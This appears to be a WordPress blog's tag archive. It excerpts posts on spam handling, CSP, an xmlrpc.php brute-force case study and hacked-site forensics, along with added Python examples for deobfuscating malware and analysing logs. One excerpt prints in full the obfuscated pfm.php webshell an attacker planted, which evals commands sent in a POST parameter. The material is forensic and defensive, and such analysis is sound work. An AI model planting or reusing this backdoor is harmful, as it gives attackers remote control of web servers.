Tag: wordpress

WordPress Extend Akismet Spam Delete Time

Akismet, by default, deletes spam after 15 days. This may be fine for most people, but I use my spam to control and deny new bots from my site. I cannot use this input when Akismet simply deletes it after the default 15 days. I am often busier than that.

Here’s a 2016 post on how to extend this 15-day time limit.

You can change the number of days Akismet should keep spam comments in your database. Simply add this code to your theme’s functions.php file or in a site-specific plugin.

add_filter( 'akismet_delete_comment_interval', 'custom_spam_delete_interval' );

Hacked By Muslim Hacker, Hacked By BLEİSY

Hacked By Muslim Hacker, Hacked By BLEİSY, screen cap, WordPress


A customer site got hacked today. Blue Host, shared service. WP core, plugins, themes all current.

They hacked the index.php on the public_html dir, and had malware code in the replaced index.php, along with 2 extra files. Front page was defaced, but site was left intact.

Added files: 9e09ad (a data file) and pfm.php (which had PHP code). Here’s the pfm.php code:

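<?php
// Fragments of one base64 string, padded with "c" characters and stored out of order.
$or="cIEBldcm";
$lq="9TVFsn";
// Stripping the "j" padding leaves the function name "str_replace" in $avj.
$avj = str_replace("j","","sjtrj_jrjejpljajcje");
$zs="FsKCRfUE";
$bu="Y21kJ10pOw==";
// $qu becomes "base64_decode" and $fh becomes "create_function".
$qu = $avj("i", "", "ibiaisie6i4i_dieicoide");
$fh = $avj("k","","crkekatkek_kfkukncktkikon");
// Reassemble the fragments, strip "c", base64-decode, and run the result.
// The decoded body is an eval() of the POSTed "cmd" parameter: a remote code execution backdoor.
$hwy = $fh('', $qu($avj("c", "", $or.$zs.$lq.$bu))); $hwy();
?>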
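For triage, the layers in pfm.php can be peeled off statically instead of running the PHP. The following is an added example, not code from the original post: a small Python evaluator that emulates only the pure string functions and records what would have reached the code-executing call. The names `decode`, `expr`, `term`, `SAFE` and `SINKS` are made up for illustration, and `SAMPLE` is the pfm.php body above with typographic quotes normalised.

```python
import base64
import re

# pfm.php body from the post, typographic quotes normalised to ASCII.
SAMPLE = r'''$or="cIEBldcm"; $lq="9TVFsn";
$avj = str_replace("j","","sjtrj_jrjejpljajcje");
$zs="FsKCRfUE"; $bu="Y21kJ10pOw==";
$qu = $avj("i", "", "ibiaisie6i4i_dieicoide");
$fh = $avj("k","","crkekatkek_kfkukncktkikon");
$hwy = $fh('', $qu($avj("c", "", $or.$zs.$lq.$bu))); $hwy();'''
TOKEN = re.compile(r'''(?P<q>["'])(?P<str>.*?)(?P=q)|(?P<name>\$?\w+)|(?P<op>[().,])''')
SAFE = {"str_replace": lambda s, r, subj: subj.replace(s, r),
        "base64_decode": lambda b: base64.b64decode(b).decode("latin-1")}
SINKS = {"create_function", "eval", "assert"}

def expr(toks, env, findings):
    """expr := term ('.' term)*, consuming tokens from the front of the list."""
    val = term(toks, env, findings)
    while toks and toks[0] == ("op", "."):
        toks.pop(0)
        val += term(toks, env, findings)
    return val

def term(toks, env, findings):
    kind, tok = toks.pop(0)
    if kind == "str":
        return tok
    # A "$var" used as a callee or operand resolves to its recovered value.
    name = env.get(tok[1:], "") if tok.startswith("$") else tok
    if not toks or toks[0] != ("op", "("):
        return name  # plain variable read
    toks.pop(0)
    args = []
    while toks[0] != ("op", ")"):
        args.append(expr(toks, env, findings))
        if toks[0] == ("op", ","):
            toks.pop(0)
    toks.pop(0)
    if name in SINKS:  # code-executing sink: never run, only reported
        findings.append((name, args[-1]))
        return ""
    return SAFE[name](*args)  # pure string function: emulated

def decode(php):
    """Return (env, findings); assumes no ';' inside string literals."""
    env, findings = {}, []
    for var, rhs in re.findall(r'\$(\w+)\s*=\s*([^;]+);', php):
        toks = [(k, v) for m in TOKEN.finditer(rhs)
                for k, v in m.groupdict().items() if v is not None and k != "q"]
        env[var] = expr(toks, env, findings)
    return env, findings
```

`decode(SAMPLE)` returns the recovered function names in `env` and one finding: the string handed to `create_function`. An unknown function name raises `KeyError` rather than being guessed at.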

WordPress Trackback Spam Technique for Content Spamming

Recently I have been observing a different WordPress spam technique that uses WP trackbacks. This technique has some interesting characteristics that are unlike other types of spam, so my usual clues as to origin and banning method did not work. Fortunately this technique also has some unique characteristics that can be used to ban them.

WordPress Trackbacks
When one WP site links to another WP site, the WP sites communicate with each other using a method called trackbacks. The first site sends a trackback request to the second site. The second site posts the trackback as a special comment, which invites the user to click through to the first site. These trackbacks are automated, making it convenient for both sites.

Hacked By An0n 3xPloiTeR, 8B0K3N H34R7, Team Pak Cyber Ghosts: Cyber Hack Forensic Examination

Hacked By An0n 3xPloiTeR And 8B0K3N H34R7 Team Pak Cyber Ghosts [P.C.G], main message screen with running footer 1


This hack suspended the hosting account and the web site as a malware infected account. The hack set up a malware attack for anyone who visited the site, specifically targeting Windows. I am still trying to figure out how they got in. This is a Pakistani-based attack, or so their message says. I’ll try to document as much as I can to help others in the same situation.

Caught me: Adblock-plus goes Rogue

The National Post put up a news article about user-centered design in cars, which turned out to be an ad. I took screen caps of this offending article and wrote about it. The image file name I used included the snippet "-ad-", which was enough for my Adblock Plus browser plugin to remove it from my view. Only after renaming the file and reuploading it could I actually see the ad. Lesson learned.

Content Security Policy on WordPress

Reading, I was, about a web site security tool from Mozilla, so I had to try it. My site, the one you are on now, rated “D-“. It was no consolation that most sites rate “F”. Within the rating there was this criterion called “Content Security Policy” (CSP) that piqued my interest.

Content Security Policy: Purpose
A CSP is a policy that you put into the head section of your page that whitelists all the sites that contribute to your page. If someone tries to add something to your page’s content but is not on your CSP, your browser will not load it. This stops a nasty infection of something called “cross site scripting” or XSS.

WordPress Web URIs: wpcspReceiveCSPviol=1 and wpCSPNonce from the WP Content Security Policy Plugin

I started to receive these WordPress URIs after someone read one of my WordPress posts. This confused me. These are connected to WordPress Failure Notices, but not quite.

The first part, wpcspReceiveCSPviol=1, was once used in a WordPress spoof to redirect people to some other site, but there was no other URL and no redirection.

POST /wp?wpcspReceiveCSPviol=1&wpCSPNonce=6606ca489f HTTP/1.1

Brute Force xmlrpc.php Attack on WordPress: Case Study

Brute force attacked, I was, for the xmlrpc.php API in WordPress. Thankfully WordPress was strong enough to ward off this attack. I’ve had random attacks on xmlrpc.php before, but nothing this organized. I thought I’d document a case of 57 xmlrpc.php POST attempts here for all to see. Maybe someone can identify the culprit, as I could not.

I had 57 POSTs to xmlrpc.php on WordPress. They are randomly spaced apart throughout the day, use different IP addresses and hosts, but use the same POST (POST /wp/xmlrpc.php HTTP/1.0), referrer (http://dontai.com/wp/xmlrpc.php) and user agent (Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko)
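Because the source addresses differ on every request, per-IP rate limits never trigger here; the constant part is the request line, referrer and user agent. The following added example (not code from the original post) groups xmlrpc.php POSTs in a combined-format access log by that fingerprint and reports fingerprints seen from several distinct addresses. The request, referrer and user agent strings are the ones quoted above; the IP addresses, timestamps, status and size fields, the two benign lines, the `min_ips` threshold and all function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

LOG = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d{3} \S+ '
                 r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')

# Values quoted in the post; everything else in the sample lines is constructed.
UA = "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"
REF = "http://dontai.com/wp/xmlrpc.php"
REQ = "POST /wp/xmlrpc.php HTTP/1.0"

def line(ip, hhmm, req=REQ, ref=REF, ua=UA):
    return f'{ip} - - [01/Jan/2017:{hhmm}:07 +0000] "{req}" 200 370 "{ref}" "{ua}"'

SAMPLE_LOG = [
    line("192.0.2.10", "01:12"),
    line("198.51.100.23", "06:48"),
    line("203.0.113.5", "13:05"),
    line("203.0.113.77", "21:39"),
    # Benign traffic: a single pingback client and an ordinary page view.
    line("198.51.100.9", "09:00", ref="-", ua="WordPress/4.7; http://example.org"),
    line("192.0.2.44", "09:01", req="GET /wp/ HTTP/1.1", ref="-"),
]

def distributed_xmlrpc(lines, min_ips=3):
    """Group xmlrpc.php POSTs by (request, referrer, UA) and report the
    fingerprints that arrive from at least min_ips distinct addresses."""
    sources = defaultdict(set)
    for entry in lines:
        m = LOG.match(entry)
        if not m:
            continue
        method, _, target = m["req"].partition(" ")
        path = urlsplit(target.split(" ")[0]).path
        if method == "POST" and path.endswith("/xmlrpc.php"):
            sources[(m["req"], m["ref"], m["ua"], path)].add(m["ip"])
    return [{"request": req, "referrer": ref, "user_agent": ua,
             "ips": sorted(ips),
             # A referrer that points at xmlrpc.php itself is unusual for a real client.
             "self_referrer": urlsplit(ref).path == path}
            for (req, ref, ua, path), ips in sources.items()
            if len(ips) >= min_ips]
```

A fingerprint reported this way can be blocked on the referrer and user agent pair at the web server, which keeps working as the source addresses rotate.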